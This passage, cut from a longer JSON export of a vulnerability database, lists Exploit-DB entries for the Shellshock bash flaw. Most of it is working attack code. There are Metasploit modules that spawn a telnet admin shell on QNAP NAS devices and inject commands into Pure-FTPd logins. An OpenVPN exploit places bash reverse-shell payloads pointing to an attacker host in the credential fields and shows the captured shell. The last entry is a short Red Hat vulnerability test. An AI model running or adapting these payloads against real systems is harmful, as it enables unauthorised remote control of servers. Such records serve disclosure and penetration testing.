CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-201...", "published": "2015-03-26T00:00:00", "type": "exploitdb", "title": "QNAP - Admin Shell via Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2015-03-26T00:00:00", "id": "EDB-ID:36503", "href": "https://www.exploit-db.com/exploits/36503/", "sourceData": "# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection\r\n# Date: 7 February 2015\r\n# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]\r\n# Employer homepage: http://www.securegroup.it\r\n# Vendor homepage: http://www.qnap.com\r\n# Version: All Turbo NAS models except TS-100, TS-101, TS-200\r\n# Tested on: TS-1279U-RP\r\n# CVE : 2014-6271\r\n# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61\r\n\r\n\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/d3vpp/metasploit-modules\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'net/telnet'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Auxiliary::CommandShell\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n\t\tThis module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.\r\n\t\tAffected products:\r\n\t\tAll Turbo NAS models except TS-100, TS-101, TS-200\r\n\t\t},\r\n 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 
0x640x330x760x620x700x70@gmail.com [other]\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n\t\t\t['CVE', '2014-6271'], #aka ShellShock\r\n\t\t\t['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']\r\n\t\t],\r\n 'Platform' => ['unix']\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),\r\n OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\tbegin\r\n \tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; echo; /usr/bin/id\"\r\n })\r\n\trescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE\r\n\t\tvprint_error(\"Connection failed\")\r\n\t\treturn Exploit::CheckCode::Unknown\r\n end\r\n\t\r\n if !res\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code== 302 and res.body.include? 
'uid'\r\n\t return Exploit::CheckCode::Vulnerable\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\t\r\n\r\n def exploit_telnet()\r\n telnetport = datastore['LTELNET']\r\n\r\n print_status(\"#{rhost}:#{rport} - Telnet port used: #{telnetport}\")\r\n\r\n print_status(\"#{rhost}:#{rport} - Sending exploit\")\r\n begin\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })\r\n\r\n if sock\r\n print_good(\"#{rhost}:#{rport} - Backdoor service spawned\")\r\n add_socket(sock)\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Backdoor service not spawned\")\r\n end\r\n\r\n print_status \"Starting a Telnet session #{rhost}:#{telnetport}\"\r\n merge_me = {\r\n 'USERPASS_FILE' => nil,\r\n 'USER_FILE' => nil,\r\n 'PASS_FILE' => nil,\r\n 'USERNAME' => nil,\r\n 'PASSWORD' => nil\r\n }\r\n start_session(self, \"TELNET (#{rhost}:#{telnetport})\", merge_me, false, sock)\r\n rescue\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Backdoor service not handled\")\r\n end\r\n return\r\n end\r\n\r\n def run\r\n\tbegin\r\n\ttelnetport = datastore['LTELNET']\r\n\tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &\"\r\n })\t\t \r\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\r\n Rex::HostUnreachable => e\r\n fail_with(Failure::Unreachable, e)\r\n ensure\r\n disconnect\r\n end\r\n\texploit_telnet()\r\n \r\n end\r\n\t\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36503/"}, {"lastseen": "2016-02-04T00:07:57", "description": "OpenVPN 2.2.29 - ShellShock Exploit. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-2014-7910. 
Remote...", "published": "2014-10-04T00:00:00", "type": "exploitdb", "title": "OpenVPN 2.2.29 - ShellShock Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-04T00:00:00", "id": "EDB-ID:34879", "href": "https://www.exploit-db.com/exploits/34879/", "sourceData": "# Exploit Title: ShellShock OpenVPN Exploit\r\n\r\n# Date: Fri Oct 3 15:48:08 EDT 2014\r\n\r\n# Exploit Author: hobbily AKA @fj33r\r\n\r\n# Version: 2.2.29\r\n\r\n# Tested on: Debian Linux\r\n\r\n# CVE : CVE-2014-6271\r\n\r\n#Probably should of submitted this the day I tweeted it.\r\n### server.conf\r\nport 1194\r\nproto udp\r\ndev tun\r\nclient-cert-not-required\r\nauth-user-pass-verify /etc/openvpn/user.sh via-env\r\ntmp-dir \"/etc/openvpn/tmp\"\r\nca ca.crt\r\ncert testing.crt\r\nkey testing.key # This file should be kept secret\r\ndh dh1024.pem\r\nserver 10.8.0.0 255.255.255.0\r\nkeepalive 10 120\r\ncomp-lzo\r\nuser nobody\r\ngroup nogroup\r\npersist-key\r\npersist-tun\r\nclient-cert-not-required\r\nplugin /usr/lib/openvpn/openvpn-auth-pam.so login\r\nscript-security 3\r\nstatus openvpn-status.log\r\nverb 3\r\n\r\n### user.sh\r\n#!/bin/bash\r\necho \"$username\"\r\necho \"$password\"\r\n\r\n### start server\r\nopenvpn server.con\r\n\r\n### terminal 1\r\nnc -lp 4444\r\n\r\n### terminal 2\r\nsudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo\r\n\r\n### username && password were both shellshocked just incase\r\nuser:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &\r\npass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &\r\n\r\n### log\r\nMon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts\r\nMon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so 
'[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY\r\nMon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key\r\nMon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate\r\nMon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]\r\nMon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]\r\nMon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1\r\nMon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened\r\nMon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100\r\nMon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0\r\nMon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500\r\nMon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2\r\nMon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]\r\nMon Sep 29 20:56:56 2014 GID set to nogroup\r\nMon Sep 29 20:56:56 2014 UID set to nobody\r\nMon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef]\r\nMon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]\r\nMon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256\r\nMon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0\r\nMon Sep 29 20:56:56 2014 Initialization Sequence Completed\r\nMon Sep 29 20:57:54 2014 MULTI: multi_create_instance called\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded'\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote 
Options hash (VER=V4): '41690919'\r\nMon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02\r\nAUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so\r\n_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__\r\n\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA\r\nMon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194\r\nMon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'\r\nMon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds\r\nMon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)\r\nMon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)\r\nMon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting\r\n\r\n### nc listener\r\nnobody@debian:/etc/openvpn$ id\r\nid\r\nuid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)\r\n#shoutouts to Fredrik Str\u00ef\u00bf\u00bdmberg for the post he made on ycombinator\r\n\r\n\r\n \t\t \t \t\t \t\t \t \t\t ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34879/"}, {"lastseen": "2016-02-04T00:05:34", "description": "Pure-FTPd External Authentication Bash Environment Variable Code Injection. 
CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7...", "published": "2014-10-02T00:00:00", "type": "exploitdb", "title": "Pure-FTPd External Authentication Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-02T00:00:00", "id": "EDB-ID:34862", "href": "https://www.exploit-db.com/exploits/34862/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Ftp\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',\r\n 'Description' => %q(\r\n This module exploits the code injection flaw known as shellshock which\r\n leverages specially crafted environment variables in Bash. 
This exploit\r\n specifically targets Pure-FTPd when configured to use an external\r\n program for authentication.\r\n ),\r\n 'Author' =>\r\n [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'Frank Denis', # Discovery of Pure-FTPd attack vector\r\n 'Spencer McIntyre' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6271'],\r\n ['OSVDB', '112004'],\r\n ['EDB', '34765'],\r\n ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 2048\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'CmdStagerFlavor' => :printf\r\n }\r\n ],\r\n [ 'Linux x86_64',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86_64,\r\n 'CmdStagerFlavor' => :printf\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014'))\r\n register_options(\r\n [\r\n Opt::RPORT(21),\r\n OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])\r\n ], self.class)\r\n deregister_options('FTPUSER', 'FTPPASS')\r\n end\r\n\r\n def check\r\n # this check method tries to use the vulnerability to bypass the login\r\n username = rand_text_alphanumeric(rand(20) + 1)\r\n random_id = (rand(100) + 1)\r\n command = \"echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end\"\r\n if send_command(username, command) =~ /^2\\d\\d ok./i\r\n return CheckCode::Safe if banner !~ /pure-ftpd/i\r\n disconnect\r\n\r\n command = \"echo auth_ok:0; echo end\"\r\n if send_command(username, command) =~ /^5\\d\\d login authentication failed/i\r\n return CheckCode::Vulnerable\r\n end\r\n end\r\n disconnect\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def execute_command(cmd, _opts)\r\n cmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\")\r\n username = rand_text_alphanumeric(rand(20) + 1)\r\n send_command(username, cmd)\r\n 
end\r\n\r\n def exploit\r\n # Cannot use generic/shell_reverse_tcp inside an elf\r\n # Checking before proceeds\r\n if generate_payload_exe.blank?\r\n fail_with(Failure::BadConfig, \"#{peer} - Failed to store payload inside executable, please select a native payload\")\r\n end\r\n\r\n execute_cmdstager(linemax: 500)\r\n handler\r\n end\r\n\r\n def send_command(username, cmd)\r\n cmd = \"() { :;}; #{datastore['RPATH']}/sh -c \\\"#{cmd}\\\"\"\r\n connect\r\n send_user(username)\r\n password_result = send_pass(cmd)\r\n disconnect\r\n password_result\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34862/"}, {"lastseen": "2016-02-03T23:53:42", "description": "GNU bash Environment Variable Command Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-2014-...", "published": "2014-09-25T00:00:00", "type": "exploitdb", "title": "GNU Bash - Environment Variable Command Injection ShellShock", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-09-25T00:00:00", "id": "EDB-ID:34765", "href": "https://www.exploit-db.com/exploits/34765/", "sourceData": "Exploit Database Note:\r\nThe following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\r\n\r\nLike \u201creal\u201d programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable).
Something like:\r\n\r\n$ env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"\r\n vulnerable\r\n this is a test\r\n\r\nThe patch used to fix this flaw ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:\r\n\r\n $ env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"\r\n bash: warning: x: ignoring function definition attempt\r\n bash: error importing function definition for `x'\r\n this is a test", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34765/"}]}